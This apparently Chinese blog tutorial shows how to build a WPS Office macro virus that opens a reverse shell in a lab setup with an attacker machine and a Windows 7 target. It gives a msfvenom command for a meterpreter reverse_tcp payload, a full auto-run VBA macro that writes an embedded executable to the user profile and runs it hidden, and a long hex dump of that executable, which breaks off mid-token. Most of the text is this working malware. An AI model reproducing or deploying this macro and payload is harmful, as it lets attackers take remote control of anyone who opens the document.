23hours
23hours

WPS Office宏病毒实现shell反弹

WPS Office宏病毒实现shell反弹

攻击机ip:192.168.59.128
靶机:win7(安装WPS 2019):192.168.59.142
反弹Shell端口:4444

首先下载安装WPS2019:
WPS Office宏病毒实现shell反弹_第1张图片
由于WPS新版更新的WPS宏编辑器对kali生成的宏代码兼容性较差,所以这里我们还是装回VB宏编辑器的环境
WPS Office宏病毒实现shell反弹_第2张图片
在github下载WPS2019vba.exe,并安装该插件(5. https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis,链接下的Macro目录下)
WPS Office宏病毒实现shell反弹_第3张图片
切换VB编辑器:
WPS Office宏病毒实现shell反弹_第4张图片
然后使用kali生成相关的宏病毒代码和载荷:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.59.128  LPORT=4444 -e x86/shikata_ga_nai -f  vba-exe

WPS Office宏病毒实现shell反弹_第5张图片

'*kali生成的宏病毒代码:

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of vba-exe file: 20421 bytes
'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************

Sub Auto_Open()
        Ipkyl12
End Sub

Sub Ipkyl12()
        Dim Ipkyl7 As Integer
        Dim Ipkyl1 As String
        Dim Ipkyl2 As String
        Dim Ipkyl3 As Integer
        Dim Ipkyl4 As Paragraph
        Dim Ipkyl8 As Integer
        Dim Ipkyl9 As Boolean
        Dim Ipkyl5 As Integer
        Dim Ipkyl11 As String
        Dim Ipkyl6 As Byte
        Dim Mpfjsvxhpn as String
        Mpfjsvxhpn = "Mpfjsvxhpn"
        Ipkyl1 = "SWDpdSaaMiphB.exe"
        Ipkyl2 = Environ("USERPROFILE")
        ChDrive (Ipkyl2)
        ChDir (Ipkyl2)
        Ipkyl3 = FreeFile()
        Open Ipkyl1 For Binary As Ipkyl3
        For Each Ipkyl4 in ActiveDocument.Paragraphs
                DoEvents
                        Ipkyl11 = Ipkyl4.Range.Text
                If (Ipkyl9 = True) Then
                        Ipkyl8 = 1
                        While (Ipkyl8 < Len(Ipkyl11))
                                Ipkyl6 = Mid(Ipkyl11,Ipkyl8,4)
                                Put #Ipkyl3, , Ipkyl6
                                Ipkyl8 = Ipkyl8 + 4
                        Wend
                ElseIf (InStr(1,Ipkyl11,Mpfjsvxhpn) > 0 And Len(Ipkyl11) > 0) Then
                        Ipkyl9 = True
                End If
        Next
        Close #Ipkyl3
        Ipkyl13(Ipkyl1)
End Sub

Sub Ipkyl13(Ipkyl10 As String)
        Dim Ipkyl7 As Integer
        Dim Ipkyl2 As String
        Ipkyl2 = Environ("USERPROFILE")
        ChDrive (Ipkyl2)
        ChDir (Ipkyl2)
        Ipkyl7 = Shell(Ipkyl10, vbHide)
End Sub

Sub AutoOpen()
        Auto_Open
End Sub

Sub Workbook_Open()
        Auto_Open
End Sub

'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

Mpfjsvxhpn
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&H24&H71&HB6&H71&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HDD&HC5&HB8&H28&H14&HD0&H15&HD9&H74&H24&HF4&H5A&H2B&HC9&H66&HB9&H04&H02&H31&H42&H1A&H03&H42&H1A&H83&HC2&H2C&HF6&H25&H24&HEC&H9E&HCD&H57&HAC&H5E&HAA&HA8&H1C&H3B&HBB&H77&HE4&H5D&H73&H20&H34&HBB&H44&H16&H40&H1F&HB1&HF2&H81&H96&H88&H5C&HE0&H6B&HFF&H5D&H41&H78&H7C&HA2&H41&HFC&HBF&H8E&H81&HF3&H01&H84&H18&H63&HF0&HA3&H9A&HF1&H98&H01&H5B&H61&H7F&HB9&HB2&H65&HCD&H2A&HB9&HC2&H48&H74&HCB&H87&HFE&H84&HB8&HEE&H66&H45&H89&HF9&H7C&H6A&H11&H13&HA3&H44&H20&H0F&HC0&HC2&HA6&HD4&H31&H65&HBA&H5D&HEC&H62&H02&H4E&H20&H5F&H4C&H46&H09&H0E&H40&H4B&H7E&HBF&H21&HE4&H4D&H6D&HC1&H7E&HF2&H8B&H2B&H1D&HB2&H7B&HF4&H4F&H49&H55&HEA&HD5&H71&HC8&HF4&H5A&HFC&H88&H84&H8B&H42&H39&H58&H64&HC4&H28&HDB&HC8&H4F&H62&HA7&H5F&HAC&H97&H9E&H59&H10&H1F&HC9&H84&H03&H4C&H65&H28&HF5&H95&H8F&H87&H7B&H3A&H40&H9E&HF9&H57&H50&H96&HF4&H3A&H99&HAB&H5E&HF0&HF5&HA1&H6C&H62&H5C&H8C&H0A&HD7&H92&H01&H22&H4B&H9A&HF2&HE5&HF7&HB6&H6B&H1B&H59&HC9&H03&H2A&HBB&H29&HAE&HBA&H63&HBA&HD4&H9C&HD4&H50&H6B&H54&HA3&H0A&H55&H82&HD5&H09&H6C&H83&H94&H9A&HF6&HC9&H42&HBC&H1B&HA7&H02&H71&H78&H18&H09&HA7&H8C&HD7&H6F&H71&H73&H19&HC3&H36&HF8&HCE&HE2&HEB&HDE&H76&HE5&H78&H40&H0F&H72&H80&H6C&H57&H0A&H7D&H77&H57&H28&H93&HD3&HE0&HF4&HFC&H21&H22&H76&H55&HF2&H7C&H35&H8A&HDA&H3C&H35&H38&H72&H91&HD3&H03&HD5&H3A&H6A&H65&H84&H04&HE0&HC9&H21&H77&H7C&H9C&H4E&H26&HFE&H6E&H7D&H8E&H7D&H0B&H47&H12&H36&H00&H21&H27&H7A&HD5&HD8&H7D&H9F&H80&H72&HA0&H0D&H48&HBE&HF3&H2C&H7B&H90&H3F&H46&H5B&HF6&H07&HCC&HEB&HAE&H9F&H1F&H15&HE9&H9D&H8E&H71&HAF&HB2&H17&H40&H61&HD8&H7E&HB3&H70&H1C&H58&H92&HEB&HC0&HAC&H9A&HB5&HE3&H8D&H24&HF4&HB6&H9E&HCD&H67&H6D&H46&HA5&H49&HDA&H58&HC4&H6B&HCA&HE7&HA0&H4F&HD4&HAE&H4F&HAB&H3D&H44&H9A&HAD&HB0&HEA&HC7&H91&HF3&H19&H7B&HC1&H90&H87&H94&H06&H63&HA4&HA8&H59&H3B&H7F&H13&H20&H3C&H28&H14&HD5&HC6&H36&H46&HEE&H91&HE6&H87&HD2&H31&HF0&H4C&H65&HE7&H9D&H9F&HC9&HD7&HEB&HE5&H26&H12&H98&HC3&H3A&H97&H73&H88&H86&H80&H42&H42&HC7&HBA&H78&HA8&HFE&H50&H3C&HF5&HDA&H1A&H11&H64&H7F&HF6&HC9&HBA&HC0&HDC&H14&H7C&H50&HDA&H96&HDE&H29&H15&H0D&HDF&H33&H4F&H58&H0D&H0A&H20&H16&HEC&HB3&HE3&HC2&H4C&H62&HF6&H3F&H83&H39&H58&HE8&HF8&H76&H2A&H45&H53&HC0&H67&HAE&HC2&H13&H34&H69&H16&H1F&H27&H4B&H08&H0D&HDD&HDE&HE3&H33&HB5&HDD&H43&H50&H29&H2F&H97&H63&HD4&H47&H4D&H28&H64&H07&H7B&HE5&H19&HE1&H79&HC3&HE4&HEE&HF2&HBC&HC4&HA9&HA8&HFB&HC0&HBC&HA1&H30&HE6&H09&H5B&H18&H44&HAA&HCC&H1C&H0D&HF1&H4F&H1C&H46&H77&HEC&H4E&HAD&H71&HBB&H62&H22&H1C&HA8&H35&H20&H25&HF2&HEF&H4A&H9B&HC9&H8B&HB5&HC2&H84&HBA&H13&H4C&HC0&HC3&HEE&HAA&HBB&HF6&H52&H11&H51&H1D&H60&H63&H5C&H16&HDF&HFC&H60&H8F&H4B&H73&H2B&HC1&H1A&H31&HEA&H49&H55&H39&HD4&H42&H6B&H02&HA4&H56&H4A&H59&H56&HF1&H0B&H0B&H6C&H04&HAF&HC8&H28&H4D&H48&HCB&HD1&H06&H73&H45&H63&HB6&HC5&H6D&HCB&HE8&HDC&H4D&H72&H13&H62&H6A&H62&HDC&HC0&H3A&HA3&HC1&H43&H08&H84&H36&HE6&HAC&HE8&HBB&HC3&H7D&H32&H35&HEB&H2F&H52&H35&H86&H18&H8B&H1D&HE4&HD6&HE8&H09&H6B&H1D&H9C&HF1&H40&H05&H37&H75&HEE&HB3&HD1&HE6&HF8&HA4&HAF&H0D&H70&H1A&HB2&HFE&H97&HBA&H50&H70&HE4&H54&HD2&HD5&H55&H5D&H04&HA9&HDB&H87&H82&HAD&H6B&H67&H50&H27&H7A&H38&H02&H5F&H80&H2B&H39&H9B&HFF&HD4&HC8&H36&HB2&H8C&H73&H23&HE3&H62&H29&H4E&H18&H3D&HD6&HF9&H1B&H6A&HBE&H1F&HCC&H55&HBA&H26&HCE&H46&H90&H09&HC2&H2A&HAF&H09&H1B&HD2&H38&H92&H78&H04&H6A&H6F&H34&H9F&H26&H42&H0B&H78&H79&HDA&H93&HE1&H99&H36&H9E&HB2&H86&H1F&H2A&HB9&HA3&H24&H08&H6E&HC5&HD6&H1E&H0E&H5A&HF4&H25&H7B&HEB&H0E&H45&H9E&HD3&HD6&H22&H26&HDA&HA5&H25&HF1&H62&HC4&H58&HD5&HD9&H9E&HF2&H2C&H5D&HD9&H54&H62&HA5&HDB&HEC&H45&H9E&H23&H30&H79&H94&H95&HC6&HB0&H4D&H03&H5D&H62&H52&H53&H6F&H34&H8E&H22&HAC&H70&H6C&H1E&HB1&H71&H64&HA9&H15&H72&H9C&H83&HFC&H1F&H51&HBC&HB6&HE4&HF8&H62&H50&HF2&H40&H04&H3F&H87&H01&H1B&H65&H87&HE8&H3E&HCE&HFE&HC9&H36&HE1&H8E&H04&H41&HDA&H65&HCE&H58&H71&H35&HEF&H0A&HE0&H59&H13&H79&H75&HEB&H4F&H5C&H77&H4A&H43&HAB&HD6&HC8&HEE&HB2&HD3&H46&H9D&HCA&H11&H1A&HC7&HBD&HE3&HAE&HA1&H8A&HD4&HD5&H7C&HDF&H6A&H9B&HB7&HAD&H27&H3E&H5F&HBD&H4F&H65&HC7&H0F&H89&H9A&HDC&HCF&H98&H80&HAE&H05&H74&HDF&HF9&HB4&HA8&H00&H39&HED&HAB&H40&H02&HAC&H05&H00&H4D&HF3&H41
&HB4&H19&H3D&HFB&HDD&HC5&HFF&H9B&H96&H9A&H70&HF7&HE6&HD7&H44&H36&HD1&H03&H76&HB9&H20&HB4&HF1&H82&HD4&H04&H28&H48&HDF&H2C&H22&H01&H48&H42&HFE&HD1&H49&HDC&H7B&H4E&H1C&H41&HC1&H7F&H58&H30&H82&HD5&H09&HA4&H64&H6F&HEE&H80&H2B&H14&HA9&H16&H67&HF4&H64&HEA&H0C&HD6&H99&HC4&HDE&HE5&HEA&H7C&H44&HAB&H18&H17&HDD&HC0&H9E&HBC&HE7&H4D&H2C&H22&HBD&HDE&H02&H52&HF6&H2B&H8E&HFF&HD3&H96&HBA&H7D&H45&HA1&H28&H03&H55&H51&HCF&HDD&H5A&H72&H9E&H59&HF6&H2A&H4C&H61&HAA&H1A&H97&HA9&HC8&HFF&H5F&HDC&HC2&H94&H79&HF0&H80&HAB&H36&H18&HD0&HD8&H43&H4B&H2B&H43&HBF&HCB&H21&HEF&H19&H8C&H6E&H68&H02&HE8&H6E&HAB&H43&H57&HD1&HF8&H82&HBD&H95&H11&H72&H17&HA3&HB2&H29&H2F&HE6&H29&HE5&H4F&H68&H80&H18&HAF&HDD&HC4&H78&H74&H15&H8D&H1C&HD4&HC5&H11&H33&H96&H41&H16&H53&H0B&H79&HF2&HB8&HFA&HB8&H64&HB4&H81&H25&HE0&H7E&H42&H2A&H45&HA6&H10&H63&H3F&HE1&HBB&HA3&HF5&H8A&H6F&H27&HC2&H7D&HC9&H78&HAA&HE0&HDB&H4A&HD8&HDC&H9A&HE8&HB1&H45&H68&H5F&H1E&H49&H23&HBF&H9F&H2F&HE8&H44&H38&H76&H02&HE9&HD1&H7F&H73&H84&HB3&H24&H4D&HF3&H52&H9D&H9C&HB7&HB0&H5A&HEC&H7E&H03&H59&HF9&H96&HEC&H1E&HFC&H63&H7C&H58&H18&H4E&HA6&HAE&H79&HCA&H6A&H8E&HB7&H79&H29&HCD&H02&HC4&H66&H52&H18&HB9&H51&H92&H84&HA3&H40&HBE&H89&H96&H87&H67&HC0&H5C&H4F&HAC&HA0&HCD&H8C&H2B&HE6&H35&H5D&HAF&H18&H73&H50&H86&H0C&H55&HB2&H4D&HC7&H64&H84&H18&HE1&HCE&H61&H5B&HA5&H25&H58&HD2&HA6&HD9&H67&HEC&H32&H10&H78&H82&HE6&H95&H0D&H7A&HD5&HF4&H7C&H15&H8C&H8D&HCD&H28&H7F&H9C&H00&HD5&H3C&H09&HD3&HA3&HFA&HF4&HF8&H1A&H77&HD5&HC4&H31&H4F&H99&H25&H43&H28&H49&HA8&HA6&HBD&H59&H94&H5B&HF6&H68&HE2&HDA&HD8&HFB&H2A&HED&H92&H2C&HC8&HB8&HC1&H4C&H09&HB5&HEB&HB5&HB2&HD8&HE0&H82&H5A&H52&HCF&H86&H90&HEC&H9B&H60&H19&H51&HEB&HD0&HAB&H55&H58&HC0&HDB&H59&H53&HE7&H11&HE4&H91&H7F&H65&HB2&HBC&H33&HF5&H4E&H28&H67&H0B&H17&H9A&H19&HF4&H92&HC7&H02&H4B&HE1&HD8&H6F&H09&HF4&H72&H57&HB6&H02&HA4&H89&H8E&HC4&H98&HE9&H60&HD1&H06&HDC&H08&H2B&H26&H3E&H15&H75&HA6&HE6&HCF&H20&H61&H30&H94&H98&HFC&H08&H8B&HAC&HDE&H1F&H7E&H97&HE9&H3F&H80&H9E&H80&HC1&HB7&HC2&HAB&H93&HC4&H91&H23&H61&H5E&H3D&H7B&HCC&H8C&HE6&H32&H5C&H9E&H83&H8B&HBB&H7D&HBD&HD1&HC7&HC7&HDA&HAE&H65&H28&HBF&H64&H23&H58&H65&H00&HD4&HA0&H77&H00&HE8&H52&H34&HF9&HCD&H5A&HC9&H5F&H28&HAF&H86&H83&H2C&HEA&H71&H05&H4B&H59&H10&HDC&H69&HFE&H3F&HFC&H00&H05&H83&HFB&H86&H52&H81&HAC&H32&H07&HB4&H6A&HE3&H56&H3F&HB4&H9A&HD6&H11&H29&HC4&H23&H28&H6E&HEB&H7E&HF3&H2A&H39&H8B&HAA&H3B&H5D&H4C&H0C&H95&H2C&H88&H50&HE4&H32&HF1&H3C&H45&HEF&HFD&HAF&H80&H16&H0C&H74&H70&HFE&HB3&H24&H88&H24&HE0&H2E&HB4&H85&H8D&H39&HAA&HD0&H28&HA6&HFC&H54&HF8&H88&H1A&H94&HCC&H73&H3E&HD0&H76&H60&H3F&HFC&H67&H78&H45&H1F&H53&HCB&H4B&HB9&H3B&H7A&H00&H48&H53&H7E&HB5&H87&HD1&H0A&HE5&HB0&HFD&H2B&H8C&H57&HBE&HF4&H8D&HBD&H7B&H6D&H1D&HB3&H9B&H72&H41&HE6&HC4&H04&HB9&HBD&H9D&H48&H9F&H2C&H0D&HCE&H35&H65&H05&H01&HF3&H3A&H3B&HF0&H96&H9E&H59&H8F&H03&H7E&H4F&HBD&H87&HD4&H6A&HE7&HF1&HAA&H1F&H1D&H01&H98&H43&H7C&HB2&HEA&H66&HC1&H7E&H3C&H42&H65&H5F&H2B&H62&HAE&H07&HF1&H9B&HFE&H24&H8C&H91&H59&HE1&H64&H45&H22&HDA&HDE&H3D&H34&H2E&HB8&HA3&HF0&H5F&H8B&H0F&HA5&H38&H60&HE7&H35&H2F&H2C&H8C&H8F&H98&H05&H69&HEB&H37&H27&HD8&H83&HCF&H3B&H5F&HDC&HCB&HA9&H21&HD1&HBA&HFF&H7E&H52&HF9&HF9&H2B&HFF&HBA&H7A&H42&H00&H2D&HFA&H39&HBE&H10&HC6&HD1&H86&H6C&H93&HCE&HE6&H3F&H45&HE5&H80&H02&H5B&HBA&HAD&H8F&H54&HB2&HCA&H8B&HA9&H37&H6D&H6E&HD4&HBD&H46&H87&H0F&H12&H04&HBA&H62&H9C&HE4&HEA&H4B&H1F&H9E&HF1&HFD&H26&HE3&H26&H45&HA8&HC8&H72&H7B&H15&H55&H54&HE1&H6B&HEA&H01&H82&H76&H10&HDD&HC4&H87&H47&HFD&HFB&H8E&H8A&H55&H83&H6E&H4E&H45&HA3&HB9&H46&H0D&HFA&HB1&H05&HE9&HB1&HF5&HC5&HCC&H10&H4D&H99&H51&H64&HA1&H52&H1F&HEE&H32&H6B&H5D&HAD&H9D&H4F&H72&HA0&HAF&HBD&HF3&H08&H07&H46&HEC&H9A&H00&H62&HF4&H12&H83&HA3&H74&HEF&H49&H4F&HBF&H91&HA0&HBB&HBC&HE6&HCF&H03&HCE&HD1&HA2&H75&H93&HCF&H45&H77&HA3&H2A&H7A&H56&HB8&H8B&H86&H12&H3F&HB9&H07&H2E&H99&HE8&H61&H08&HE4&H74&HDF&H44&H41&H6D&H69&H80&HE8&HFF&H40&HF4&H48&HB5&H24&HAE&HF9&HD1&H7B&H3A&H77&H2D&H3A&HFC&H95&H2C&HBC&HD5&H3A&H72&HF7&H43&HDF&H73&HC8&HE1&H05&H70&H52&H5C&HC4&HAB&HC4&HC5&H19&H64&HCB&HC6&H45&H69&H9F&HFA&H30&H5D&H79&HB1&H5C&HE9&HE1&H59&H04&H4D&HBB&H2B&HCB&HC3&H06&H1A&H7C&H6A&H98&H51&H21&HC5&H58&H0A&HAE&H31&HB5&HF7&H51&H15&HA5&H1C&HE3&H95&HAB&H63&HE0&HEA&H45&H69&H69&H1E&H07&HDA&H15&H86&HBC&HB6&HA1&H50&H2B&HF6&H3E&H7F&HBC&H99&H7A&H68&H55&HDA&HB2&H71&H1D&HC8&H6E&H8C&HDB&HBC&H41&H1F&H7D&H22&HDE&HBB&H51&HA2&H52&H75&HCB&HB2&HA2&HBB&H45&HAE&HEB&H6A&HB8&H16&HCD&HA9&H19&HAF&H96&H22&H7D&H6F&H76&H57&HAD&HFE&H14&H6C&H02&HFA&H7C&H49&H39&H82&H80&HD1&H43&H43&HF3&H14&H59&H10&H41&H93&HCE&H16&H14&H71&HC1&H09&H4E&H21&H31&HD5&HD2&H27&HEB&H69&H93&HCA&HAC&H23&H3E&HC1&H2F&H11&H53&H3D&H60&HC1&H7A&H94&H04&HE3&H52&HB1&H05&H1C&H0A&HF4&H59&H9E&H79&H40&HDD&H62&HDF&H33&HF7&H7D&H07&H9D&H5B&H40&HCE&H16&H4D&H96&H83&H8D&HDB&HCB&H0C&HEF&H1F&H89&H29&H54&H9B&HBE&H45&HE2&H77&H43&HCF&H11&HA5&H3C&H51&H0D&H98&H06&HB7&H1B&H51&H26&H45&H74&HA0&H69&H3D&H5F&HE3&H56&H6D&H59&H32&H4C&H2D&H7D&HDA&H08&HA5&H70&HA6&H31&H94&H65&H3F&HDE&H87&HE3&H84&H9A&H4B&H3A&HF6&H25&H28&H35&HE3&H02&HC1&H09&H9F&H81&HB4&HCE&HDD&H50&H09&HC5&H24&H91&H8C&H5B&H52&H6D&H7C&H0A&H49&HC6&H37&HF1&H10&HCF&HF7&H48&H36&HE1&H2E&HA2&H13&HCB&H29&H73&HC2&H52&HEB&HE3&H3F&HF2&H84&HE3&HC4&H91&H5D&H5F&HC1&H4E&H4A&HBE&HF2&H36&H4B&H1E&H43&H6C&H7F&H5D&H05&HFA&H0F&HE7&H3F&HB3&H8D&H47&HDB&H3D&HA2&H41&H8B&H4C&HF4&H87&HC8&H49&H9F&H5F&H52&H76&H46&HBA&HCF&H18&H68&HF4&HD8&H8E&H4B&HA2&HE5&HDA&HFD&H1B&HB6&HD8&HEA&HF3&HC0&H3E&H28&HD6&H8C&HB5&H2E&HBA&H8D&H27&HCB&H62&HDA&HF7&H2A&H99&HC1&HBB&HB1&HF1&HA2&HB3&HBE&H58&H2F&H83&HEE&H7A&HC5&HAB&H27&H57&HE6&HC7&HE3&H9F&HB7&HDF&H0D&HDA&HDB&HC0&HB4&H04&HEE&H45&H49&HB7&H4E&H77&H21&H8F&H9A&HD9&H23&H78&H2E&H34&H53&H34&HE9&HF7&H3E&H3D&H35&H90&HCD&HB5&HDB&H9B&HCF&HE6&H71&H64&HC3&H24&H23&H42&H60&HD5&H77&H8D&H53&HE4&H0B&H09&H89&H03&H44&H34&H68&HCA&H27&HC9&H73&HAE&H6D&H40&H2A&H53&HC9&HF9&HF1&HFC&H76&HA1&HD1&HD1&H88&HAC&HEC&H8F&HC5&H9A&HDE&H0E&H14&HC7&H1F&H70&H6C&H7F&HF5&HB8&H29&H3A&HE3&H83&HF8&HFE&HC0&HE3&HB5&H7C&HBE&HE1&HB8&H3D&HA3&H93&H48&H8A&HB9&HBB&H3F&H40&HCA&HCB&H01&H93&H40&H31&H5A&H33&H42&H0E&H79&HA0&H13&HB4&H44&H94&HC8&HF2&H51&H57&HEF&HD5&H2F&H73&HB2&H14&H4A&H8B&HF1&HE4&H8D&HA1&H40&H09&HFE&H3E&HB2&HA6&H93&H2D&HBF&HE0&H6C&H67&HEA&HDF&HAF&H6F&HA0&H72&H6F&H1E&H82&H49&H05&HCD&HFB&H88&H80&HBE&HC0&HBB&H7B&HBB&HFE&H4C&H47&H15&H25&H52&HC9&H01&H9F&H61&H78&HD7&H90&H52&H88&H14&HC0&HEC&HD7&HAF&H67&HA6&H5B&H5B&HBC&H8A&HDC&H57&H53&H11&H54&H0A&H2D&H4E&H17&H93&HD0&HEC&HDF&H02&HB1&HF5&H65&H49&HF1&H14&HAB&H76&H8F&HB0&HDA&H78&HF6&H8E&H4C&H8A&H91&HB4&HE0&H9D&H87&H5F&HA5&H96&H66&H93&HEA&H25&HD7&HC5&HAF&H74&H5A&H6D&HC9&H23&HDB&HDF&H8B&H23&H40&H84&HEE&H1B&H19&H8D&H19&H8A&HE3&H2B&HCA&HE7&H2A&H6C&HB5&H06&H8E&H08&H31&HF7&H1F&HAD&H6F&H38&H6F&H8D&HF3&H28&H37&H83&HE8&HC2&H38&HE2&H08&HF9&HE1&H76&H79&H41&H54&HC4&HEC&H1F&H7E&HC8&HF1&HE5&H23&H0C&HEE&H8A&HCA&H7F&HFD&H27&H4C&H57&H70&H78&HD2&HD9&H56&HFB&H21&H3A&H0F&H77&H52&H38&H5E&HB9&H7C&HAE&HE9&H40&H41&H31&H1E&H64&HB7&H7B&HFA&HFF&H5A&H3C&HCC&H35&H17&H07&H44&H51&H79&H0C&HD8&HC8&HB3&H0F&HF8&H7D&H03&HE0&H6F&H04&H8B&HA3&H2B&H23&H27&H52&H48&H8F&HDA&H6A&H38&H79&H48&H47&H30&H35&H6F&H94&H51&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H